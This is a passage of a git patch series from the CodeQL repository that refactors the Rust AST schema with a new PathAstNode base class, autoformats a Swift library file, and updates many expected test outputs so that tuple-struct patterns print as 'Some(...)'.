b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql @@ -3,8 +3,8 @@ import codeql.rust.elements import TestUtils from - TupleStructPat x, string hasResolvedPath, string hasResolvedCrateOrigin, int getNumberOfFields, - string hasPath + TupleStructPat x, string hasResolvedPath, string hasResolvedCrateOrigin, string hasPath, + int getNumberOfFields where toBeTested(x) and not x.isUnknown() and @@ -14,7 +14,7 @@ where then hasResolvedCrateOrigin = "yes" else hasResolvedCrateOrigin = "no" ) and - getNumberOfFields = x.getNumberOfFields() and - if x.hasPath() then hasPath = "yes" else hasPath = "no" + (if x.hasPath() then hasPath = "yes" else hasPath = "no") and + getNumberOfFields = x.getNumberOfFields() select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, - "getNumberOfFields:", getNumberOfFields, "hasPath:", hasPath + "hasPath:", hasPath, "getNumberOfFields:", getNumberOfFields diff --git a/rust/ql/test/library-tests/dataflow/sources/InlineFlow.ql b/rust/ql/test/library-tests/dataflow/sources/InlineFlow.ql index 2b08aeea63f..5bcbe05229b 100644 --- a/rust/ql/test/library-tests/dataflow/sources/InlineFlow.ql +++ b/rust/ql/test/library-tests/dataflow/sources/InlineFlow.ql @@ -10,9 +10,9 @@ module MyFlowConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof ThreatModelSource } predicate isSink(DataFlow::Node sink) { - any(CallExpr call | - call.getFunction().(PathExpr).getPath().getResolvedPath() = "crate::test::sink" - ).getArgList().getAnArg() = sink.asExpr().getExpr() + any(CallExpr call | call.getFunction().(PathExpr).getResolvedPath() = "crate::test::sink") + .getArgList() + .getAnArg() = sink.asExpr().getExpr() } } diff --git a/rust/schema/annotations.py b/rust/schema/annotations.py index 05a163de9bf..d51f5328380 100644 --- a/rust/schema/annotations.py +++ b/rust/schema/annotations.py @@ -114,13 +114,13 @@ class _: """ -class PathExprBase(Expr, Resolvable): +class PathExprBase(Expr): """ A path expression or a variable access in a formatting template. See `PathExpr` and `FormatTemplateVariableAccess` for further details. """ -@annotate(PathExpr, replace_bases={Expr: PathExprBase}, cfg = True) +@annotate(PathExpr, replace_bases={Expr: PathExprBase}, add_bases=(PathAstNode,), cfg = True) @qltest.test_with(Path) class _: """ @@ -132,6 +132,7 @@ class _: let z = ::foo; ``` """ + path: drop @annotate(IfExpr, cfg = True) @@ -412,7 +413,7 @@ class _: """ -@annotate(RecordExpr, add_bases=(Resolvable,), cfg = True) +@annotate(RecordExpr, add_bases=(PathAstNode,), cfg = True) class _: """ A record expression. For example: @@ -423,6 +424,7 @@ class _: Foo { .. } = second; ``` """ + path: drop @annotate(FieldExpr, cfg = True) @@ -682,7 +684,7 @@ class _: """ -@annotate(RecordPat, add_bases=(Resolvable,), cfg = True) +@annotate(RecordPat, add_bases=(PathAstNode,), cfg = True) class _: """ A record pattern. For example: @@ -693,6 +695,7 @@ class _: } ``` """ + path: drop @annotate(RangePat, cfg = True) @@ -723,7 +726,7 @@ class _: """ -@annotate(PathPat, add_bases=(Resolvable,), cfg = True) +@annotate(PathPat, add_bases=(PathAstNode,), cfg = True) @qltest.test_with(Path) class _: """ @@ -735,6 +738,7 @@ class _: } ``` """ + path: drop @annotate(LiteralPat, cfg = True) @@ -769,7 +773,7 @@ class _: """ -@annotate(TupleStructPat, add_bases=(Resolvable,), cfg = True) +@annotate(TupleStructPat, add_bases=(PathAstNode,), cfg = True) class _: """ A tuple struct pattern. For example: @@ -781,6 +785,7 @@ class _: }; ``` """ + path: drop @annotate(RefPat, cfg = True) diff --git a/rust/schema/prelude.py b/rust/schema/prelude.py index 9b9858be6a5..c22875cc858 100644 --- a/rust/schema/prelude.py +++ b/rust/schema/prelude.py @@ -89,7 +89,14 @@ class Addressable(AstNode): class Resolvable(AstNode): """ - Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. + One of `PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat` or `MethodCallExpr`. """ resolved_path: optional[string] | rust.detach | ql.internal resolved_crate_origin: optional[string] | rust.detach | ql.internal + + +class PathAstNode(Resolvable): + """ + An AST element wrapping a path (`PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat`). + """ + path: optional["Path"] | child From e9deec7217f70db573d081bd9c6b9415f6b762c1 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 29 Nov 2024 16:03:06 +0000 Subject: [PATCH 0768/1267] Rust: Autoformat. --- .../frameworks/StandardLibrary/RawRepresentable.qll | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll index bc468d3c4f8..bbd583a32a4 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll @@ -12,10 +12,11 @@ private import codeql.swift.dataflow.FlowSteps */ private class RawRepresentableSummaries extends SummaryModelCsv { override predicate row(string row) { - row = [ - ";RawRepresentable;true;init(rawValue:);;;Argument[0];ReturnValue;taint", - ";OptionSet;true;init(rawValue:);;;Argument[0];ReturnValue;taint" - ] + row = + [ + ";RawRepresentable;true;init(rawValue:);;;Argument[0];ReturnValue;taint", + ";OptionSet;true;init(rawValue:);;;Argument[0];ReturnValue;taint" + ] } } From bb83641634c13ea42c66dbf7d0bfe599354a522a Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Mon, 2 Dec 2024 08:22:51 +0100 Subject: [PATCH 0769/1267] Rust: accept all test changes for now --- .../generated/BoxPat/BoxPat_getPat.expected | 2 +- .../IdentPat/IdentPat_getPat.expected | 2 +- .../generated/LetExpr/LetExpr_getPat.expected | 2 +- .../generated/LetStmt/LetStmt_getPat.expected | 2 +- .../MatchArm/MatchArm_getPat.expected | 4 +- .../generated/OrPat/OrPat_getPat.expected | 2 +- .../generated/RefPat/RefPat_getPat.expected | 2 +- .../controlflow-unstable/Cfg.expected | 6 +- .../library-tests/controlflow/Cfg.expected | 68 +++++----- .../dataflow/local/DataFlowStep.expected | 68 ++++++---- .../dataflow/local/inline-flow.expected | 56 ++++++-- .../test/library-tests/variables/Cfg.expected | 128 +++++++++--------- 12 files changed, 198 insertions(+), 144 deletions(-) diff --git a/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected b/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected index 4e12432652d..a43975657a8 100644 --- a/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected @@ -1,2 +1,2 @@ -| gen_box_pat.rs:6:9:6:27 | box ... | gen_box_pat.rs:6:13:6:27 | TupleStructPat | +| gen_box_pat.rs:6:9:6:27 | box ... | gen_box_pat.rs:6:13:6:27 | ...::Some(...) | | gen_box_pat.rs:7:9:7:24 | box ...::None | gen_box_pat.rs:7:13:7:24 | ...::None | diff --git a/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected b/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected index 2e2f0d9228e..3c2fd2dc379 100644 --- a/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected @@ -1 +1 @@ -| gen_ident_pat.rs:10:9:10:25 | y | gen_ident_pat.rs:10:11:10:25 | TupleStructPat | +| gen_ident_pat.rs:10:9:10:25 | y | gen_ident_pat.rs:10:11:10:25 | ...::Some(...) | diff --git a/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected b/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected index 7c31e314128..b935bd98013 100644 --- a/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected @@ -1 +1 @@ -| gen_let_expr.rs:5:8:5:31 | let ... = maybe_some | gen_let_expr.rs:5:12:5:18 | TupleStructPat | +| gen_let_expr.rs:5:8:5:31 | let ... = maybe_some | gen_let_expr.rs:5:12:5:18 | Some(...) | diff --git a/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected b/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected index 758837c946d..cd4c3f8cc64 100644 --- a/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected @@ -3,4 +3,4 @@ | gen_let_stmt.rs:7:5:7:15 | let ... | gen_let_stmt.rs:7:9:7:9 | x | | gen_let_stmt.rs:8:5:8:10 | let ... | gen_let_stmt.rs:8:9:8:9 | x | | gen_let_stmt.rs:9:5:9:24 | let ... = ... | gen_let_stmt.rs:9:9:9:14 | TuplePat | -| gen_let_stmt.rs:10:5:12:6 | let ... = ... else {...} | gen_let_stmt.rs:10:9:10:15 | TupleStructPat | +| gen_let_stmt.rs:10:5:12:6 | let ... = ... else {...} | gen_let_stmt.rs:10:9:10:15 | Some(...) | diff --git a/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected b/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected index 9928555fc32..d4adba7f838 100644 --- a/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected @@ -1,4 +1,4 @@ -| gen_match_arm.rs:6:9:6:29 | ... => y | gen_match_arm.rs:6:9:6:23 | TupleStructPat | +| gen_match_arm.rs:6:9:6:29 | ... => y | gen_match_arm.rs:6:9:6:23 | ...::Some(...) | | gen_match_arm.rs:7:9:7:26 | ...::None => 0 | gen_match_arm.rs:7:9:7:20 | ...::None | -| gen_match_arm.rs:10:9:10:35 | ... if ... => ... | gen_match_arm.rs:10:9:10:15 | TupleStructPat | +| gen_match_arm.rs:10:9:10:35 | ... if ... => ... | gen_match_arm.rs:10:9:10:15 | Some(...) | | gen_match_arm.rs:11:9:11:15 | _ => 0 | gen_match_arm.rs:11:9:11:9 | _ | diff --git a/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected b/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected index 22ebce5dde5..9e50c27e035 100644 --- a/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected @@ -1,2 +1,2 @@ -| gen_or_pat.rs:6:9:6:38 | ... \| ...::None | 0 | gen_or_pat.rs:6:9:6:23 | TupleStructPat | +| gen_or_pat.rs:6:9:6:38 | ... \| ...::None | 0 | gen_or_pat.rs:6:9:6:23 | ...::Some(...) | | gen_or_pat.rs:6:9:6:38 | ... \| ...::None | 1 | gen_or_pat.rs:6:27:6:38 | ...::None | diff --git a/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected b/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected index d4f78daeb82..029fd9fa172 100644 --- a/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected @@ -1,2 +1,2 @@ -| gen_ref_pat.rs:6:9:6:28 | &mut ... | gen_ref_pat.rs:6:14:6:28 | TupleStructPat | +| gen_ref_pat.rs:6:9:6:28 | &mut ... | gen_ref_pat.rs:6:14:6:28 | ...::Some(...) | | gen_ref_pat.rs:7:9:7:21 | &...::None | gen_ref_pat.rs:7:10:7:21 | ...::None | diff --git a/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected b/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected index 4260e2384c8..7a7d9884f19 100644 --- a/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected +++ b/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected @@ -14,10 +14,10 @@ edges | test.rs:6:12:6:31 | [boolean(false)] ... && ... | test.rs:9:13:9:17 | false | false | | test.rs:6:12:6:31 | [boolean(true)] ... && ... | test.rs:7:13:7:13 | d | true | | test.rs:6:17:6:31 | let ... = b | test.rs:6:31:6:31 | b | | -| test.rs:6:21:6:27 | TupleStructPat | test.rs:6:12:6:31 | [boolean(false)] ... && ... | no-match | -| test.rs:6:21:6:27 | TupleStructPat | test.rs:6:26:6:26 | d | match | +| test.rs:6:21:6:27 | Some(...) | test.rs:6:12:6:31 | [boolean(false)] ... && ... | no-match | +| test.rs:6:21:6:27 | Some(...) | test.rs:6:26:6:26 | d | match | | test.rs:6:26:6:26 | d | test.rs:6:12:6:31 | [boolean(true)] ... && ... | match | -| test.rs:6:31:6:31 | b | test.rs:6:21:6:27 | TupleStructPat | | +| test.rs:6:31:6:31 | b | test.rs:6:21:6:27 | Some(...) | | | test.rs:6:33:8:9 | { ... } | test.rs:6:9:10:9 | if ... {...} else {...} | | | test.rs:7:13:7:13 | d | test.rs:6:33:8:9 | { ... } | | | test.rs:8:16:10:9 | { ... } | test.rs:6:9:10:9 | if ... {...} else {...} | | diff --git a/rust/ql/test/library-tests/controlflow/Cfg.expected b/rust/ql/test/library-tests/controlflow/Cfg.expected index 5137e2f8b89..3165b2354be 100644 --- a/rust/ql/test/library-tests/controlflow/Cfg.expected +++ b/rust/ql/test/library-tests/controlflow/Cfg.expected @@ -191,11 +191,11 @@ edges | test.rs:98:27:98:28 | 10 | test.rs:98:24:98:28 | 1..10 | | | test.rs:99:9:103:9 | while ... { ... } | test.rs:97:25:104:5 | { ... } | | | test.rs:99:15:99:39 | let ... = ... | test.rs:99:29:99:32 | iter | | -| test.rs:99:19:99:25 | TupleStructPat | test.rs:99:9:103:9 | while ... { ... } | no-match | -| test.rs:99:19:99:25 | TupleStructPat | test.rs:99:24:99:24 | x | match | +| test.rs:99:19:99:25 | Some(...) | test.rs:99:9:103:9 | while ... { ... } | no-match | +| test.rs:99:19:99:25 | Some(...) | test.rs:99:24:99:24 | x | match | | test.rs:99:24:99:24 | x | test.rs:100:17:100:17 | x | match | | test.rs:99:29:99:32 | iter | test.rs:99:29:99:39 | ... .next(...) | | -| test.rs:99:29:99:39 | ... .next(...) | test.rs:99:19:99:25 | TupleStructPat | | +| test.rs:99:29:99:39 | ... .next(...) | test.rs:99:19:99:25 | Some(...) | | | test.rs:99:41:103:9 | { ... } | test.rs:99:15:99:39 | let ... = ... | | | test.rs:100:13:102:13 | if ... {...} | test.rs:99:41:103:9 | { ... } | | | test.rs:100:17:100:17 | x | test.rs:100:22:100:22 | 5 | | @@ -274,10 +274,10 @@ edges | test.rs:137:48:143:5 | { ... } | test.rs:137:5:143:5 | exit fn test_if_let_else (normal) | | | test.rs:138:9:142:9 | if ... {...} else {...} | test.rs:137:48:143:5 | { ... } | | | test.rs:138:12:138:26 | let ... = a | test.rs:138:26:138:26 | a | | -| test.rs:138:16:138:22 | TupleStructPat | test.rs:138:21:138:21 | n | match | -| test.rs:138:16:138:22 | TupleStructPat | test.rs:141:13:141:13 | 0 | no-match | +| test.rs:138:16:138:22 | Some(...) | test.rs:138:21:138:21 | n | match | +| test.rs:138:16:138:22 | Some(...) | test.rs:141:13:141:13 | 0 | no-match | | test.rs:138:21:138:21 | n | test.rs:139:13:139:13 | n | match | -| test.rs:138:26:138:26 | a | test.rs:138:16:138:22 | TupleStructPat | | +| test.rs:138:26:138:26 | a | test.rs:138:16:138:22 | Some(...) | | | test.rs:138:28:140:9 | { ... } | test.rs:138:9:142:9 | if ... {...} else {...} | | | test.rs:139:13:139:13 | n | test.rs:138:28:140:9 | { ... } | | | test.rs:140:16:142:9 | { ... } | test.rs:138:9:142:9 | if ... {...} else {...} | | @@ -290,10 +290,10 @@ edges | test.rs:146:9:148:9 | ExprStmt | test.rs:146:12:146:26 | let ... = a | | | test.rs:146:9:148:9 | if ... {...} | test.rs:149:9:149:9 | 0 | | | test.rs:146:12:146:26 | let ... = a | test.rs:146:26:146:26 | a | | -| test.rs:146:16:146:22 | TupleStructPat | test.rs:146:9:148:9 | if ... {...} | no-match | -| test.rs:146:16:146:22 | TupleStructPat | test.rs:146:21:146:21 | n | match | +| test.rs:146:16:146:22 | Some(...) | test.rs:146:9:148:9 | if ... {...} | no-match | +| test.rs:146:16:146:22 | Some(...) | test.rs:146:21:146:21 | n | match | | test.rs:146:21:146:21 | n | test.rs:147:13:147:21 | ExprStmt | match | -| test.rs:146:26:146:26 | a | test.rs:146:16:146:22 | TupleStructPat | | +| test.rs:146:26:146:26 | a | test.rs:146:16:146:22 | Some(...) | | | test.rs:147:13:147:20 | return n | test.rs:145:5:150:5 | exit fn test_if_let (normal) | return | | test.rs:147:13:147:21 | ExprStmt | test.rs:147:20:147:20 | n | | | test.rs:147:20:147:20 | n | test.rs:147:13:147:20 | return n | | @@ -663,19 +663,19 @@ edges | test.rs:307:19:307:42 | ...: Option::<...> | test.rs:308:15:308:25 | maybe_digit | | | test.rs:307:52:313:5 | { ... } | test.rs:307:5:313:5 | exit fn test_match (normal) | | | test.rs:308:9:312:9 | match maybe_digit { ... } | test.rs:307:52:313:5 | { ... } | | -| test.rs:308:15:308:25 | maybe_digit | test.rs:309:13:309:27 | TupleStructPat | | -| test.rs:309:13:309:27 | TupleStructPat | test.rs:309:26:309:26 | x | match | -| test.rs:309:13:309:27 | TupleStructPat | test.rs:310:13:310:27 | TupleStructPat | no-match | +| test.rs:308:15:308:25 | maybe_digit | test.rs:309:13:309:27 | ...::Some(...) | | +| test.rs:309:13:309:27 | ...::Some(...) | test.rs:309:26:309:26 | x | match | +| test.rs:309:13:309:27 | ...::Some(...) | test.rs:310:13:310:27 | ...::Some(...) | no-match | | test.rs:309:26:309:26 | x | test.rs:309:32:309:32 | x | match | | test.rs:309:32:309:32 | x | test.rs:309:36:309:37 | 10 | | | test.rs:309:32:309:37 | ... < ... | test.rs:309:42:309:42 | x | true | -| test.rs:309:32:309:37 | ... < ... | test.rs:310:13:310:27 | TupleStructPat | false | +| test.rs:309:32:309:37 | ... < ... | test.rs:310:13:310:27 | ...::Some(...) | false | | test.rs:309:36:309:37 | 10 | test.rs:309:32:309:37 | ... < ... | | | test.rs:309:42:309:42 | x | test.rs:309:46:309:46 | 5 | | | test.rs:309:42:309:46 | ... + ... | test.rs:308:9:312:9 | match maybe_digit { ... } | | | test.rs:309:46:309:46 | 5 | test.rs:309:42:309:46 | ... + ... | | -| test.rs:310:13:310:27 | TupleStructPat | test.rs:310:26:310:26 | x | match | -| test.rs:310:13:310:27 | TupleStructPat | test.rs:311:13:311:24 | ...::None | no-match | +| test.rs:310:13:310:27 | ...::Some(...) | test.rs:310:26:310:26 | x | match | +| test.rs:310:13:310:27 | ...::Some(...) | test.rs:311:13:311:24 | ...::None | no-match | | test.rs:310:26:310:26 | x | test.rs:310:32:310:32 | x | match | | test.rs:310:32:310:32 | x | test.rs:308:9:312:9 | match maybe_digit { ... } | | | test.rs:311:13:311:24 | ...::None | test.rs:311:29:311:29 | 5 | match | @@ -686,7 +686,7 @@ edges | test.rs:315:44:315:67 | ...: Option::<...> | test.rs:316:19:316:29 | maybe_digit | | | test.rs:315:77:324:5 | { ... } | test.rs:315:5:324:5 | exit fn test_match_with_return_in_scrutinee (normal) | | | test.rs:316:9:323:9 | match ... { ... } | test.rs:315:77:324:5 | { ... } | | -| test.rs:316:16:320:9 | if ... {...} else {...} | test.rs:321:13:321:27 | TupleStructPat | | +| test.rs:316:16:320:9 | if ... {...} else {...} | test.rs:321:13:321:27 | ...::Some(...) | | | test.rs:316:19:316:29 | maybe_digit | test.rs:316:34:316:37 | Some | | | test.rs:316:19:316:40 | ... == ... | test.rs:317:13:317:21 | ExprStmt | true | | test.rs:316:19:316:40 | ... == ... | test.rs:319:13:319:23 | maybe_digit | false | @@ -698,8 +698,8 @@ edges | test.rs:317:20:317:20 | 3 | test.rs:317:13:317:20 | return 3 | | | test.rs:318:16:320:9 | { ... } | test.rs:316:16:320:9 | if ... {...} else {...} | | | test.rs:319:13:319:23 | maybe_digit | test.rs:318:16:320:9 | { ... } | | -| test.rs:321:13:321:27 | TupleStructPat | test.rs:321:26:321:26 | x | match | -| test.rs:321:13:321:27 | TupleStructPat | test.rs:322:13:322:24 | ...::None | no-match | +| test.rs:321:13:321:27 | ...::Some(...) | test.rs:321:26:321:26 | x | match | +| test.rs:321:13:321:27 | ...::Some(...) | test.rs:322:13:322:24 | ...::None | no-match | | test.rs:321:26:321:26 | x | test.rs:321:32:321:32 | x | match | | test.rs:321:32:321:32 | x | test.rs:321:36:321:36 | 5 | | | test.rs:321:32:321:36 | ... + ... | test.rs:316:9:323:9 | match ... { ... } | | @@ -716,9 +716,9 @@ edges | test.rs:327:9:330:18 | ... && ... | test.rs:326:60:331:5 | { ... } | | | test.rs:327:10:330:9 | [boolean(false)] match r { ... } | test.rs:327:9:330:18 | ... && ... | false | | test.rs:327:10:330:9 | [boolean(true)] match r { ... } | test.rs:330:15:330:18 | cond | true | -| test.rs:327:16:327:16 | r | test.rs:328:13:328:19 | TupleStructPat | | -| test.rs:328:13:328:19 | TupleStructPat | test.rs:328:18:328:18 | a | match | -| test.rs:328:13:328:19 | TupleStructPat | test.rs:329:13:329:13 | _ | no-match | +| test.rs:327:16:327:16 | r | test.rs:328:13:328:19 | Some(...) | | +| test.rs:328:13:328:19 | Some(...) | test.rs:328:18:328:18 | a | match | +| test.rs:328:13:328:19 | Some(...) | test.rs:329:13:329:13 | _ | no-match | | test.rs:328:18:328:18 | a | test.rs:328:24:328:24 | a | match | | test.rs:328:24:328:24 | a | test.rs:327:10:330:9 | [boolean(false)] match r { ... } | false | | test.rs:328:24:328:24 | a | test.rs:327:10:330:9 | [boolean(true)] match r { ... } | true | @@ -731,12 +731,12 @@ edges | test.rs:333:35:333:58 | ...: Result::<...> | test.rs:334:15:334:15 | r | | | test.rs:333:66:338:5 | { ... } | test.rs:333:5:338:5 | exit fn test_match_with_no_arms (normal) | | | test.rs:334:9:337:9 | match r { ... } | test.rs:333:66:338:5 | { ... } | | -| test.rs:334:15:334:15 | r | test.rs:335:13:335:21 | TupleStructPat | | -| test.rs:335:13:335:21 | TupleStructPat | test.rs:335:16:335:20 | value | match | -| test.rs:335:13:335:21 | TupleStructPat | test.rs:336:13:336:22 | TupleStructPat | no-match | +| test.rs:334:15:334:15 | r | test.rs:335:13:335:21 | Ok(...) | | +| test.rs:335:13:335:21 | Ok(...) | test.rs:335:16:335:20 | value | match | +| test.rs:335:13:335:21 | Ok(...) | test.rs:336:13:336:22 | Err(...) | no-match | | test.rs:335:16:335:20 | value | test.rs:335:26:335:30 | value | match | | test.rs:335:26:335:30 | value | test.rs:334:9:337:9 | match r { ... } | | -| test.rs:336:13:336:22 | TupleStructPat | test.rs:336:17:336:21 | never | match | +| test.rs:336:13:336:22 | Err(...) | test.rs:336:17:336:21 | never | match | | test.rs:336:17:336:21 | never | test.rs:336:33:336:37 | never | match | | test.rs:336:27:336:40 | match never { ... } | test.rs:334:9:337:9 | match r { ... } | | | test.rs:336:33:336:37 | never | test.rs:336:27:336:40 | match never { ... } | | @@ -746,10 +746,10 @@ edges | test.rs:343:23:343:36 | ...: Option::<...> | test.rs:344:9:344:57 | let ... = a else {...} | | | test.rs:343:46:346:5 | { ... } | test.rs:343:5:346:5 | exit fn test_let_match (normal) | | | test.rs:344:9:344:57 | let ... = a else {...} | test.rs:344:23:344:23 | a | | -| test.rs:344:13:344:19 | TupleStructPat | test.rs:344:18:344:18 | n | match | -| test.rs:344:13:344:19 | TupleStructPat | test.rs:344:39:344:53 | MacroStmts | no-match | +| test.rs:344:13:344:19 | Some(...) | test.rs:344:18:344:18 | n | match | +| test.rs:344:13:344:19 | Some(...) | test.rs:344:39:344:53 | MacroStmts | no-match | | test.rs:344:18:344:18 | n | test.rs:345:9:345:9 | n | match | -| test.rs:344:23:344:23 | a | test.rs:344:13:344:19 | TupleStructPat | | +| test.rs:344:23:344:23 | a | test.rs:344:13:344:19 | Some(...) | | | test.rs:344:32:344:54 | ...::panic_fmt | test.rs:344:39:344:53 | "Expected some" | | | test.rs:344:32:344:54 | MacroExpr | test.rs:344:30:344:56 | { ... } | | | test.rs:344:39:344:53 | "Expected some" | test.rs:344:39:344:53 | FormatArgsExpr | | @@ -770,9 +770,9 @@ edges | test.rs:349:9:352:10 | let ... = ... | test.rs:349:25:349:25 | m | | | test.rs:349:13:349:15 | ret | test.rs:353:9:353:12 | true | match | | test.rs:349:19:352:9 | match m { ... } | test.rs:349:13:349:15 | ret | | -| test.rs:349:25:349:25 | m | test.rs:350:13:350:21 | TupleStructPat | | -| test.rs:350:13:350:21 | TupleStructPat | test.rs:350:18:350:20 | ret | match | -| test.rs:350:13:350:21 | TupleStructPat | test.rs:351:13:351:16 | None | no-match | +| test.rs:349:25:349:25 | m | test.rs:350:13:350:21 | Some(...) | | +| test.rs:350:13:350:21 | Some(...) | test.rs:350:18:350:20 | ret | match | +| test.rs:350:13:350:21 | Some(...) | test.rs:351:13:351:16 | None | no-match | | test.rs:350:18:350:20 | ret | test.rs:350:26:350:28 | ret | match | | test.rs:350:26:350:28 | ret | test.rs:349:19:352:9 | match m { ... } | | | test.rs:351:13:351:16 | None | test.rs:351:28:351:32 | false | match | @@ -1030,10 +1030,10 @@ edges | test.rs:484:13:484:13 | x | test.rs:485:9:487:10 | let ... = x else {...} | match | | test.rs:484:30:484:33 | None | test.rs:484:13:484:13 | x | | | test.rs:485:9:487:10 | let ... = x else {...} | test.rs:485:23:485:23 | x | | -| test.rs:485:13:485:19 | TupleStructPat | test.rs:485:18:485:18 | y | match | -| test.rs:485:13:485:19 | TupleStructPat | test.rs:486:13:486:27 | ExprStmt | no-match | +| test.rs:485:13:485:19 | Some(...) | test.rs:485:18:485:18 | y | match | +| test.rs:485:13:485:19 | Some(...) | test.rs:486:13:486:27 | ExprStmt | no-match | | test.rs:485:18:485:18 | y | test.rs:488:9:488:9 | 0 | match | -| test.rs:485:23:485:23 | x | test.rs:485:13:485:19 | TupleStructPat | | +| test.rs:485:23:485:23 | x | test.rs:485:13:485:19 | Some(...) | | | test.rs:486:13:486:26 | break ''block 1 | test.rs:483:18:489:5 | 'block: { ... } | break | | test.rs:486:13:486:27 | ExprStmt | test.rs:486:26:486:26 | 1 | | | test.rs:486:26:486:26 | 1 | test.rs:486:13:486:26 | break ''block 1 | | diff --git a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected index a49da751679..a6ecc87bebe 100644 --- a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected @@ -34,7 +34,7 @@ localStep | main.rs:32:9:32:9 | [SSA] b | main.rs:36:10:36:10 | b | | main.rs:32:9:32:9 | b | main.rs:32:9:32:9 | [SSA] b | | main.rs:32:13:35:5 | match m { ... } | main.rs:32:9:32:9 | b | -| main.rs:32:19:32:19 | m | main.rs:33:9:33:15 | TupleStructPat | +| main.rs:32:19:32:19 | m | main.rs:33:9:33:15 | Some(...) | | main.rs:32:19:32:19 | m | main.rs:34:9:34:12 | None | | main.rs:33:20:33:20 | a | main.rs:32:13:35:5 | match m { ... } | | main.rs:34:17:34:17 | 0 | main.rs:32:13:35:5 | match m { ... } | @@ -82,14 +82,14 @@ localStep | main.rs:105:9:105:10 | [SSA] s2 | main.rs:110:11:110:12 | s2 | | main.rs:105:9:105:10 | s2 | main.rs:105:9:105:10 | [SSA] s2 | | main.rs:105:14:105:28 | ...::Some(...) | main.rs:105:9:105:10 | s2 | -| main.rs:106:11:106:12 | s1 | main.rs:107:9:107:23 | TupleStructPat | +| main.rs:106:11:106:12 | s1 | main.rs:107:9:107:23 | ...::Some(...) | | main.rs:106:11:106:12 | s1 | main.rs:108:9:108:20 | ...::None | | main.rs:107:22:107:22 | [SSA] n | main.rs:107:33:107:33 | n | | main.rs:107:22:107:22 | n | main.rs:107:22:107:22 | [SSA] n | | main.rs:107:28:107:34 | sink(...) | main.rs:106:5:109:5 | match s1 { ... } | | main.rs:108:25:108:31 | sink(...) | main.rs:106:5:109:5 | match s1 { ... } | | main.rs:110:5:113:5 | match s2 { ... } | main.rs:103:37:114:1 | { ... } | -| main.rs:110:11:110:12 | s2 | main.rs:111:9:111:23 | TupleStructPat | +| main.rs:110:11:110:12 | s2 | main.rs:111:9:111:23 | ...::Some(...) | | main.rs:110:11:110:12 | s2 | main.rs:112:9:112:20 | ...::None | | main.rs:111:22:111:22 | [SSA] n | main.rs:111:33:111:33 | n | | main.rs:111:22:111:22 | n | main.rs:111:22:111:22 | [SSA] n | @@ -101,14 +101,14 @@ localStep | main.rs:118:9:118:10 | [SSA] s2 | main.rs:123:11:123:12 | s2 | | main.rs:118:9:118:10 | s2 | main.rs:118:9:118:10 | [SSA] s2 | | main.rs:118:14:118:20 | Some(...) | main.rs:118:9:118:10 | s2 | -| main.rs:119:11:119:12 | s1 | main.rs:120:9:120:15 | TupleStructPat | +| main.rs:119:11:119:12 | s1 | main.rs:120:9:120:15 | Some(...) | | main.rs:119:11:119:12 | s1 | main.rs:121:9:121:12 | None | | main.rs:120:14:120:14 | [SSA] n | main.rs:120:25:120:25 | n | | main.rs:120:14:120:14 | n | main.rs:120:14:120:14 | [SSA] n | | main.rs:120:20:120:26 | sink(...) | main.rs:119:5:122:5 | match s1 { ... } | | main.rs:121:17:121:23 | sink(...) | main.rs:119:5:122:5 | match s1 